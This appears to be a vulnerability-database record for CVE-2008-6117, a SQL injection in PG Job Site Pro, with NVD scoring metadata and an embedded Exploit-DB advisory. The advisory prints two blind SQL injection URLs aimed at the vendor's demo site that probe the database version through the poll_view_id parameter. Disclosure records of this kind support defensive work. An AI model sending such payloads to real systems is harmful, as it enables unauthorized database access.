ID CVE-2008-6117
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
SQL injection vulnerability in homepage.php in PG Job Site Pro allows remote attackers to execute arbitrary SQL commands via the poll_view_id parameter in a results action.
{"id": "CVE-2008-6117", "bulletinFamily": "NVD", "title": "CVE-2008-6117", "description": "SQL injection vulnerability in homepage.php in PG Job Site Pro allows remote attackers to execute arbitrary SQL commands via the poll_view_id parameter in a results action.", "published": "2009-02-11T17:30:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6117", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/32837", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46789", "http://www.vupen.com/english/advisories/2008/3237", "https://www.exploit-db.com/exploits/7202", "http://www.securityfocus.com/bid/32434"], "cvelist": ["CVE-2008-6117"], "type": "cve", "lastseen": "2019-05-29T18:09:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "3ef51700141444dde90ad084f03f8fd2"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "abe458d128420e70081d27dfab8e27f5"}, {"key": "cpe23", "hash": "43a6963c9465321cf5df8b6db9293bed"}, {"key": "cvelist", "hash": "cc6236453251514d17550ccbbe1b6233"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "a45879cb17e7b777b73e072f650bf26e"}, {"key": "href", "hash": "7fad1a5a99dc0280e796b118fd3f015d"}, {"key": "modified", "hash": "43dd24ddc80228cca727a2ae69707805"}, {"key": "published", "hash": "3a45b27393a9a8400057aba46d23f61e"}, {"key": "references", "hash": "46a7fcc1dad3b671ec0ffbf2010b1b97"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "caaaab5d15ec5f7cc35ef95b96847c1e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1bc82e0b5f9101055e7612f6f75dbdd66ae8094279ffabe549a6bb506bfce68d", "viewCount": 0, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:09:30"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7202"]}], "modified": "2019-05-29T18:09:30"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:pilotgroup:pg_job_site_pro:-"], "affectedSoftware": [{"name": "pilotgroup pg_job_site_pro", "operator": "eq", "version": "-"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:pilotgroup:pg_job_site_pro:-:*:*:*:*:*:*:*"], "cwe": ["CWE-89"]}
{"exploitdb": [{"lastseen": "2016-02-01T02:38:52", "bulletinFamily": "exploit", "description": "PG Job Site (poll_view_id) Blind SQL Injection Vulnerability. CVE-2008-6117. Webapps exploit for php platform", "modified": "2008-11-23T00:00:00", "published": "2008-11-23T00:00:00", "id": "EDB-ID:7202", "href": "https://www.exploit-db.com/exploits/7202/", "type": "exploitdb", "title": "PG Job Site poll_view_id Blind SQL Injection Vulnerability", "sourceData": "[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.\n[~]\n[~]----------------------------------------------------------\n[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com\n[~]\n[~] Date: 23.11.2008\n[~]\n[~] Home: www.z0rlu.blogspot.com\n[~]\n[~] Kucuk Bir Rica: Lutfen Demolar\u00c3\u00bd Hacklemeyin ( pls dont make hack demos )\n[~]\n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (\n[~]\n[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )\n[~] -----------------------------------------------------------\n\nexploit for demo: ( you must login to site after you test this links. you look left for two link)\n\nhttp://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )\n\nhttp://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )\n\n[~]----------------------------------------------------------------------\n[~] Greetz tO: str0ke & all Muslim HaCkeRs\n[~]\n[~] yildirimordulari.org & darkc0de.com\n[~]\n[~]----------------------------------------------------------------------\n\n# milw0rm.com [2008-11-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7202/"}]}